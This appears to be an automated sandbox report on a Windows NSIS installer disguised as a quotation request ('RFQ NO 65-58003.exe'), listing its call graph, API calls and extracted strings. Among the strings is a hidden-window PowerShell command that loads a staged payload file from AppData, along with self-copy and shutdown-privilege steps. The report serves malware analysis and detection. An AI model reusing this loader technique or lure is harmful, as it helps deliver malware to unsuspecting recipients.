4040e4 3894->3897 3895 4040e9 GetSystemMenu EnableMenuItem SendMessageW 3896 404119 SendMessageW 3895->3896 3895->3897 3896->3897 3897->3895 3915 40430b SendMessageW 3897->3915 3916 406212 lstrcpynW 3897->3916 3900 404147 lstrlenW 3901 406234 18 API calls 3900->3901 3902 40415d SetWindowTextW 3901->3902 3903 401389 2 API calls 3902->3903 3903->3884 3905 4041bb CreateDialogParamW 3904->3905 3904->3913 3906 4041ee 3905->3906 3905->3913 3907 4042d6 19 API calls 3906->3907 3908 4041f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3907->3908 3909 401389 2 API calls 3908->3909 3910 40423f 3909->3910 3910->3874 3911 404247 ShowWindow 3910->3911 3912 404322 SendMessageW 3911->3912 3912->3913 3913->3873 3913->3874 3914->3894 3915->3897 3916->3900 3917 40287e 3918 402c53 18 API calls 3917->3918 3919 402885 FindFirstFileW 3918->3919 3920 402898 3919->3920 3921 4028ad 3919->3921 3922 4028b6 3921->3922 3925 406159 wsprintfW 3921->3925 3926 406212 lstrcpynW 3922->3926 3925->3922 3926->3920 4394 4019ff 4395 402c53 18 API calls 4394->4395 4396 401a06 4395->4396 4397 402c53 18 API calls 4396->4397 4398 401a0f 4397->4398 4399 401a16 lstrcmpiW 4398->4399 4400 401a28 lstrcmpW 4398->4400 4401 401a1c 4399->4401 4400->4401 4402 401000 4403 401037 BeginPaint GetClientRect 4402->4403 4404 40100c DefWindowProcW 4402->4404 4406 4010f3 4403->4406 4407 401179 4404->4407 4408 401073 CreateBrushIndirect FillRect DeleteObject 4406->4408 4409 4010fc 4406->4409 4408->4406 4410 401102 CreateFontIndirectW 4409->4410 4411 401167 EndPaint 4409->4411 4410->4411 4412 401112 6 API calls 4410->4412 4411->4407 4412->4411 4413 401503 4414 40150b 4413->4414 4416 40151e 4413->4416 4415 402c31 18 API calls 4414->4415 4415->4416 4417 402104 4418 402c53 18 API calls 4417->4418 4419 40210b 4418->4419 4420 402c53 18 API calls 4419->4420 4421 402115 4420->4421 4422 402c53 18 API calls 4421->4422 4423 40211f 4422->4423 4424 402c53 18 API calls 4423->4424 4425 402129 4424->4425 4426 402c53 18 API calls 4425->4426 4428 402133 4426->4428 4427 402172 CoCreateInstance 4432 402191 4427->4432 4428->4427 4429 402c53 18 API calls 4428->4429 4429->4427 4430 401423 25 API calls 4431 402250 4430->4431 4432->4430 4432->4431 4433 402805 4434 40280c 4433->4434 4436 402a86 4433->4436 4435 402c31 18 API calls 4434->4435 4437 402813 4435->4437 4438 402822 SetFilePointer 4437->4438 4438->4436 4439 402832 4438->4439 4441 406159 wsprintfW 4439->4441 4441->4436 3661 40230c 3662 402314 3661->3662 3665 40231a 3661->3665 3663 402c53 18 API calls 3662->3663 3663->3665 3664 402c53 18 API calls 3666 402328 3664->3666 3665->3664 3665->3666 3667 402c53 18 API calls 3666->3667 3669 402336 3666->3669 3667->3669 3668 402c53 18 API calls 3670 40233f WritePrivateProfileStringW 3668->3670 3669->3668 4442 40190c 4443 401943 4442->4443 4444 402c53 18 API calls 4443->4444 4445 401948 4444->4445 4446 405a03 69 API calls 4445->4446 4447 401951 4446->4447 4448 401f8c 4449 402c53 18 API calls 4448->4449 4450 401f93 4449->4450 4451 4065ec 5 API calls 4450->4451 4452 401fa2 4451->4452 4453 401fbe GlobalAlloc 4452->4453 4456 402026 4452->4456 4454 401fd2 4453->4454 4453->4456 4455 4065ec 5 API calls 4454->4455 4457 401fd9 4455->4457 4458 4065ec 5 API calls 4457->4458 4459 401fe3 4458->4459 4459->4456 4463 406159 wsprintfW 4459->4463 4461 402018 4464 406159 wsprintfW 4461->4464 4463->4461 4464->4456 4465 40258c 4466 402c53 18 API calls 4465->4466 4467 402593 4466->4467 4470 405de7 GetFileAttributesW CreateFileW 4467->4470 4469 40259f 4470->4469 3671 40238e 3672 402393 3671->3672 3673 4023be 3671->3673 3684 402d5d 3672->3684 3675 402c53 18 API calls 3673->3675 3678 4023c5 3675->3678 3676 40239a 3677 4023a4 3676->3677 3679 4023dd 3676->3679 3680 402c53 18 API calls 3677->3680 3688 402c93 RegOpenKeyExW 3678->3688 3682 4023ab RegDeleteValueW RegCloseKey 3680->3682 3682->3679 3685 402c53 18 API calls 3684->3685 3686 402d76 3685->3686 3687 402d84 RegOpenKeyExW 3686->3687 3687->3676 3692 402cbe 3688->3692 3697 4023db 3688->3697 3689 402ce4 RegEnumKeyW 3690 402cf6 RegCloseKey 3689->3690 3689->3692 3691 4065ec 5 API calls 3690->3691 3694 402d06 3691->3694 3692->3689 3692->3690 3693 402d1b RegCloseKey 3692->3693 3695 402c93 5 API calls 3692->3695 3693->3697 3696 402d36 RegDeleteKeyW 3694->3696 3694->3697 3695->3692 3696->3697 3697->3679 4471 401d0e 4472 402c31 18 API calls 4471->4472 4473 401d15 4472->4473 4474 402c31 18 API calls 4473->4474 4475 401d21 GetDlgItem 4474->4475 4476 4025a8 4475->4476 4477 40190f 4478 402c53 18 API calls 4477->4478 4479 401916 4478->4479 4480 405957 MessageBoxIndirectW 4479->4480 4481 40191f 4480->4481 3808 402511 3809 402d5d 19 API calls 3808->3809 3810 40251b 3809->3810 3811 402c31 18 API calls 3810->3811 3812 402524 3811->3812 3813 402533 3812->3813 3817 4028a1 3812->3817 3814 402540 RegEnumKeyW 3813->3814 3815 40254c RegEnumValueW 3813->3815 3816 402565 RegCloseKey 3814->3816 3815->3816 3815->3817 3816->3817 4496 401491 4497 405371 25 API calls 4496->4497 4498 401498 4497->4498 4506 402d98 4507 402daa SetTimer 4506->4507 4509 402dc3 4506->4509 4507->4509 4508 402e11 4509->4508 4510 402e17 MulDiv 4509->4510 4511 402dd1 wsprintfW SetWindowTextW SetDlgItemTextW 4510->4511 4511->4508 4513 401c19 4514 402c31 18 API calls 4513->4514 4515 401c20 4514->4515 4516 402c31 18 API calls 4515->4516 4517 401c2d 4516->4517 4518 402c53 18 API calls 4517->4518 4519 401c42 4517->4519 4518->4519 4520 402c53 18 API calls 4519->4520 4525 401c52 4519->4525 4520->4525 4521 401ca9 4524 402c53 18 API calls 4521->4524 4522 401c5d 4523 402c31 18 API calls 4522->4523 4526 401c62 4523->4526 4527 401cae 4524->4527 4525->4521 4525->4522 4528 402c31 18 API calls 4526->4528 4529 402c53 18 API calls 4527->4529 4530 401c6e 4528->4530 4531 401cb7 FindWindowExW 4529->4531 4532 401c99 SendMessageW 4530->4532 4533 401c7b SendMessageTimeoutW 4530->4533 4534 401cd9 4531->4534 4532->4534 4533->4534 4535 403a19 4536 403a24 4535->4536 4537 403a28 4536->4537 4538 403a2b GlobalAlloc 4536->4538 4538->4537 4539 40249d 4540 402d5d 19 API calls 4539->4540 4541 4024a7 4540->4541 4542 402c53 18 API calls 4541->4542 4543 4024b0 4542->4543 4544 4028a1 4543->4544 4545 4024bb RegQueryValueExW 4543->4545 4546 4024db 4545->4546 4549 4024e1 RegCloseKey 4545->4549 4546->4549 4550 406159 wsprintfW 4546->4550 4549->4544 4550->4549 4551 40149e 4552 4022f7 4551->4552 4553 4014ac PostQuitMessage 4551->4553 4553->4552 4554 4015a3 4555 402c53 18 API calls 4554->4555 4556 4015aa SetFileAttributesW 4555->4556 4557 4015bc 4556->4557 4558 404424 lstrlenW 4559 404443 4558->4559 4560 404445 WideCharToMultiByte 4558->4560 4559->4560 4568 40472a 4569 404760 4568->4569 4570 40473a 4568->4570 4572 40433d 8 API calls 4569->4572 4571 4042d6 19 API calls 4570->4571 4573 404747 SetDlgItemTextW 4571->4573 4574 40476c 4572->4574 4573->4569 4575 4025ae 4576 4025c2 4575->4576 4577 4025dd 4575->4577 4580 402c31 18 API calls 4576->4580 4578 402611 4577->4578 4579 4025e2 4577->4579 4582 402c53 18 API calls 4578->4582 4581 402c53 18 API calls 4579->4581 4585 4025c9 4580->4585 4583 4025e9 WideCharToMultiByte lstrlenA 4581->4583 4584 402618 lstrlenW 4582->4584 4583->4585 4584->4585 4586 40265b 4585->4586 4587 402645 4585->4587 4589 405ec8 5 API calls 4585->4589 4587->4586 4588 405e99 WriteFile 4587->4588 4588->4586 4589->4587 3739 4054b0 3740 4054d1 GetDlgItem GetDlgItem GetDlgItem 3739->3740 3741 40565a 3739->3741 3784 40430b SendMessageW 3740->3784 3743 405663 GetDlgItem CreateThread CloseHandle 3741->3743 3744 40568b 3741->3744 3743->3744 3807 405444 5 API calls 3743->3807 3746 4056b6 3744->3746 3747 4056a2 ShowWindow ShowWindow 3744->3747 3748 4056db 3744->3748 3745 405541 3752 405548 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3745->3752 3749 4056f0 ShowWindow 3746->3749 3750 4056ca 3746->3750 3753 405716 3746->3753 3789 40430b SendMessageW 3747->3789 3793 40433d 3748->3793 3757 405710 3749->3757 3758 405702 3749->3758 3790 4042af 3750->3790 3759 4055b6 3752->3759 3760 40559a SendMessageW SendMessageW 3752->3760 3753->3748 3761 405724 SendMessageW 3753->3761 3756 4056e9 3763 4042af SendMessageW 3757->3763 3762 405371 25 API calls 3758->3762 3764 4055c9 3759->3764 3765 4055bb SendMessageW 3759->3765 3760->3759 3761->3756 3766 40573d CreatePopupMenu 3761->3766 3762->3757 3763->3753 3785 4042d6 3764->3785 3765->3764 3768 406234 18 API calls 3766->3768 3769 40574d AppendMenuW 3768->3769 3771 40576a GetWindowRect 3769->3771 3772 40577d TrackPopupMenu 3769->3772 3770 4055d9 3773 4055e2 ShowWindow 3770->3773 3774 405616 GetDlgItem SendMessageW 3770->3774 3771->3772 3772->3756 3775 405798 3772->3775 3776 4055f8 ShowWindow 3773->3776 3779 405605 3773->3779 3774->3756 3777 40563d SendMessageW SendMessageW 3774->3777 3778 4057b4 SendMessageW 3775->3778 3776->3779 3777->3756 3778->3778 3780 4057d1 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3778->3780 3788 40430b SendMessageW 3779->3788 3782 4057f6 SendMessageW 3780->3782 3782->3782 3783 40581f GlobalUnlock SetClipboardData CloseClipboard 3782->3783 3783->3756 3784->3745 3786 406234 18 API calls 3785->3786 3787 4042e1 SetDlgItemTextW 3786->3787 3787->3770 3788->3774 3789->3746 3791 4042b6 3790->3791 3792 4042bc SendMessageW 3790->3792 3791->3792 3792->3748 3794 404355 GetWindowLongW 3793->3794 3804 4043de 3793->3804 3795 404366 3794->3795 3794->3804 3796 404375 GetSysColor 3795->3796 3797 404378 3795->3797 3796->3797 3798 404388 SetBkMode 3797->3798 3799 40437e SetTextColor 3797->3799 3800 4043a0 GetSysColor 3798->3800 3801 4043a6 3798->3801 3799->3798 3800->3801 3802 4043b7 3801->3802 3803 4043ad SetBkColor 3801->3803 3802->3804 3805 4043d1 CreateBrushIndirect 3802->3805 3806 4043ca DeleteObject 3802->3806 3803->3802 3804->3756 3805->3804 3806->3805 4590 401a30 4591 402c53 18 API calls 4590->4591 4592 401a39 ExpandEnvironmentStringsW 4591->4592 4593 401a4d 4592->4593 4595 401a60 4592->4595 4594 401a52 lstrcmpW 4593->4594 4593->4595 4594->4595 4601 402032 4602 402044 4601->4602 4603 4020f6 4601->4603 4604 402c53 18 API calls 4602->4604 4606 401423 25 API calls 4603->4606 4605 40204b 4604->4605 4607 402c53 18 API calls 4605->4607 4611 402250 4606->4611 4608 402054 4607->4608 4609 40206a LoadLibraryExW 4608->4609 4610 40205c GetModuleHandleW 4608->4610 4609->4603 4612 40207b 4609->4612 4610->4609 4610->4612 4621 40665b WideCharToMultiByte 4612->4621 4615 4020c5 4617 405371 25 API calls 4615->4617 4616 40208c 4618 401423 25 API calls 4616->4618 4619 40209c 4616->4619 4617->4619 4618->4619 4619->4611 4620 4020e8 FreeLibrary 4619->4620 4620->4611 4622 406685 GetProcAddress 4621->4622 4623 402086 4621->4623 4622->4623 4623->4615 4623->4616 4624 401d33 4625 402c31 18 API calls 4624->4625 4626 401d44 SetWindowLongW 4625->4626 4627 402adb 4626->4627 4628 401db3 GetDC 4629 402c31 18 API calls 4628->4629 4630 401dc5 GetDeviceCaps MulDiv ReleaseDC 4629->4630 4631 402c31 18 API calls 4630->4631 4632 401df6 4631->4632 4633 406234 18 API calls 4632->4633 4634 401e33 CreateFontIndirectW 4633->4634 4635 4025a8 4634->4635 4636 401735 4637 402c53 18 API calls 4636->4637 4638 40173c SearchPathW 4637->4638 4639 401757 4638->4639 4640 402ab6 SendMessageW 4641 402ad0 InvalidateRect 4640->4641 4642 402adb 4640->4642 4641->4642 4643 402837 4644 40283d 4643->4644 4645 402845 FindClose 4644->4645 4646 402adb 4644->4646 4645->4646 4647 4014b8 4648 4014be 4647->4648 4649 401389 2 API calls 4648->4649 4650 4014c6 4649->4650 4651 4029be 4652 402c31 18 API calls 4651->4652 4653 4029c4 4652->4653 4654 402a04 4653->4654 4655 4029eb 4653->4655 4663 4028a1 4653->4663 4656 402a1e 4654->4656 4657 402a0e 4654->4657 4658 4029f0 4655->4658 4664 402a01 4655->4664 4660 406234 18 API calls 4656->4660 4659 402c31 18 API calls 4657->4659 4665 406212 lstrcpynW 4658->4665 4659->4664 4660->4664 4664->4663 4666 406159 wsprintfW 4664->4666 4665->4663 4666->4663

                                                              Executed Functions

                                                              Function 0040344A Relevance: 93.2, APIs: 34, Strings: 19, Instructions: 401stringfilecomCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 40344a-40347d SetErrorMode GetVersion 1 403490 0->1 2 40347f-403487 call 4065ec 0->2 3 403495-4034a9 call 40657c lstrlenA 1->3 2->1 7 403489 2->7 9 4034ab-40351f call 4065ec * 2 #17 OleInitialize SHGetFileInfoW call 406212 GetCommandLineW call 406212 GetModuleHandleW 3->9 7->1 18 403521-403528 9->18 19 403529-403543 call 405bf3 CharNextW 9->19 18->19 22 403549-40354f 19->22 23 40365a-403674 GetTempPathW call 403419 19->23 24 403551-403556 22->24 25 403558-40355c 22->25 30 403676-403694 GetWindowsDirectoryW lstrcatW call 403419 23->30 31 4036cc-4036e6 DeleteFileW call 402ed5 23->31 24->24 24->25 27 403563-403567 25->27 28 40355e-403562 25->28 32 403626-403633 call 405bf3 27->32 33 40356d-403573 27->33 28->27 30->31 46 403696-4036c6 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403419 30->46 50 403797-4037a7 ExitProcess CoUninitialize 31->50 51 4036ec-4036f2 31->51 48 403635-403636 32->48 49 403637-40363d 32->49 37 403575-40357d 33->37 38 40358e-4035c7 33->38 42 403584 37->42 43 40357f-403582 37->43 44 4035e4-40361e 38->44 45 4035c9-4035ce 38->45 42->38 43->38 43->42 44->32 47 403620-403624 44->47 45->44 52 4035d0-4035d8 45->52 46->31 46->50 47->32 56 403645-403653 call 406212 47->56 48->49 49->22 57 403643 49->57 60 4038cd-4038d3 50->60 61 4037ad-4037bd call 405957 ExitProcess 50->61 58 403787-40378e call 403a5b 51->58 59 4036f8-403703 call 405bf3 51->59 53 4035da-4035dd 52->53 54 4035df 52->54 53->44 53->54 54->44 66 403658 56->66 57->66 76 403793 58->76 78 403751-40375b 59->78 79 403705-40373a 59->79 63 403951-403959 60->63 64 4038d5-4038eb GetCurrentProcess OpenProcessToken 60->64 70 40395b 63->70 71 40395f-403963 ExitProcess 63->71 73 403921-40392f call 4065ec 64->73 74 4038ed-40391b LookupPrivilegeValueW AdjustTokenPrivileges 64->74 66->23 70->71 86 403931-40393b 73->86 87 40393d-403948 ExitWindowsEx 73->87 74->73 76->50 80 4037c3-4037d7 call 4058da lstrcatW 78->80 81 40375d-40376b call 405cce 78->81 83 40373c-403740 79->83 94 4037e4-4037fe lstrcatW lstrcmpiW 80->94 95 4037d9-4037df lstrcatW 80->95 81->50 96 40376d-403783 call 406212 * 2 81->96 88 403742-403747 83->88 89 403749-40374d 83->89 86->87 93 40394a-40394c call 40140b 86->93 87->63 87->93 88->89 90 40374f 88->90 89->83 89->90 90->78 93->63 94->50 99 403800-403803 94->99 95->94 96->58 101 403805-40380a call 405840 99->101 102 40380c call 4058bd 99->102 109 403811-40381f SetCurrentDirectoryW 101->109 102->109 110 403821-403827 call 406212 109->110 111 40382c-403855 call 406212 109->111 110->111 115 40385a-403876 call 406234 DeleteFileW 111->115 118 4038b7-4038bf 115->118 119 403878-403888 CopyFileW 115->119 118->115 120 4038c1-4038c8 call 4060b3 118->120 119->118 121 40388a-4038aa call 4060b3 call 406234 call 4058f2 119->121 120->50 121->118 130 4038ac-4038b3 CloseHandle 121->130 130->118
                                                              APIs
                                                              • SetErrorMode.KERNELBASE ref: 0040346D
                                                              • GetVersion.KERNEL32 ref: 00403473
                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040349C
                                                              • #17.COMCTL32(00000007,00000009), ref: 004034BF
                                                              • OleInitialize.OLE32(00000000), ref: 004034C6
                                                              • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 004034E2
                                                              • GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 004034F7
                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00000000), ref: 0040350A
                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00000020), ref: 00403531
                                                                • Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                                • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040366B
                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040367C
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403688
                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040369C
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004036A4
                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004036B5
                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004036BD
                                                              • DeleteFileW.KERNELBASE(1033), ref: 004036D1
                                                                • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                              • ExitProcess.KERNEL32(?), ref: 00403797
                                                              • CoUninitialize.COMBASE(?), ref: 0040379C
                                                              • ExitProcess.KERNEL32 ref: 004037BD
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00000000,?), ref: 004037D0
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00000000,?), ref: 004037DF
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00000000,?), ref: 004037EA
                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00000000,?), ref: 004037F6
                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403812
                                                              • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gas,?), ref: 0040386C
                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\RFQ NO 65-58003.exe,00420EE8,00000001), ref: 00403880
                                                              • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000), ref: 004038AD
                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 004038DC
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004038E3
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 0040391B
                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403940
                                                              • ExitProcess.KERNEL32 ref: 00403963
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Processlstrcat$ExitFile$Handle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                              • String ID: "C:\Users\user\Desktop\RFQ NO 65-58003.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\afdragsordning$C:\Users\user\AppData\Roaming\afdragsordning\Overrack2$C:\Users\user\Desktop$C:\Users\user\Desktop\RFQ NO 65-58003.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gas$~nsu
                                                              • API String ID: 354199918-1437079879
                                                              • Opcode ID: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
                                                              • Instruction ID: 1c098c9ac5d33f9e9f606ea88917c77842503da0397251e5f420d8b791505771
                                                              • Opcode Fuzzy Hash: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
                                                              • Instruction Fuzzy Hash: 92D107B1200301ABD7207F659D49A3B3AACEB80709F51443FF881B62D1DB7D8952CB6E
                                                              Function 004054B0 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 131 4054b0-4054cb 132 4054d1-405598 GetDlgItem * 3 call 40430b call 404c0e GetClientRect GetSystemMetrics SendMessageW * 2 131->132 133 40565a-405661 131->133 155 4055b6-4055b9 132->155 156 40559a-4055b4 SendMessageW * 2 132->156 135 405663-405685 GetDlgItem CreateThread CloseHandle 133->135 136 40568b-405698 133->136 135->136 138 4056b6-4056c0 136->138 139 40569a-4056a0 136->139 140 4056c2-4056c8 138->140 141 405716-40571a 138->141 143 4056a2-4056b1 ShowWindow * 2 call 40430b 139->143 144 4056db-4056e4 call 40433d 139->144 145 4056f0-405700 ShowWindow 140->145 146 4056ca-4056d6 call 4042af 140->146 141->144 149 40571c-405722 141->149 143->138 152 4056e9-4056ed 144->152 153 405710-405711 call 4042af 145->153 154 405702-40570b call 405371 145->154 146->144 149->144 157 405724-405737 SendMessageW 149->157 153->141 154->153 160 4055c9-4055e0 call 4042d6 155->160 161 4055bb-4055c7 SendMessageW 155->161 156->155 162 405839-40583b 157->162 163 40573d-405768 CreatePopupMenu call 406234 AppendMenuW 157->163 170 4055e2-4055f6 ShowWindow 160->170 171 405616-405637 GetDlgItem SendMessageW 160->171 161->160 162->152 168 40576a-40577a GetWindowRect 163->168 169 40577d-405792 TrackPopupMenu 163->169 168->169 169->162 172 405798-4057af 169->172 173 405605 170->173 174 4055f8-405603 ShowWindow 170->174 171->162 175 40563d-405655 SendMessageW * 2 171->175 176 4057b4-4057cf SendMessageW 172->176 177 40560b-405611 call 40430b 173->177 174->177 175->162 176->176 178 4057d1-4057f4 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 176->178 177->171 180 4057f6-40581d SendMessageW 178->180 180->180 181 40581f-405833 GlobalUnlock SetClipboardData CloseClipboard 180->181 181->162
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000403), ref: 0040550E
                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040551D
                                                              • GetClientRect.USER32(?,?), ref: 0040555A
                                                              • GetSystemMetrics.USER32(00000002), ref: 00405561
                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405582
                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405593
                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004055A6
                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004055B4
                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004055C7
                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004055E9
                                                              • ShowWindow.USER32(?,00000008), ref: 004055FD
                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040561E
                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040562E
                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405647
                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405653
                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040552C
                                                                • Part of subcall function 0040430B: SendMessageW.USER32(00000028,?,00000001,00404137), ref: 00404319
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405670
                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005444,00000000), ref: 0040567E
                                                              • CloseHandle.KERNELBASE(00000000), ref: 00405685
                                                              • ShowWindow.USER32(00000000), ref: 004056A9
                                                              • ShowWindow.USER32(?,00000008), ref: 004056AE
                                                              • ShowWindow.USER32(00000008), ref: 004056F8
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040572C
                                                              • CreatePopupMenu.USER32 ref: 0040573D
                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405751
                                                              • GetWindowRect.USER32(?,?), ref: 00405771
                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057C2
                                                              • OpenClipboard.USER32(00000000), ref: 004057D2
                                                              • EmptyClipboard.USER32 ref: 004057D8
                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004057E4
                                                              • GlobalLock.KERNEL32(00000000), ref: 004057EE
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405802
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405822
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040582D
                                                              • CloseClipboard.USER32 ref: 00405833
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
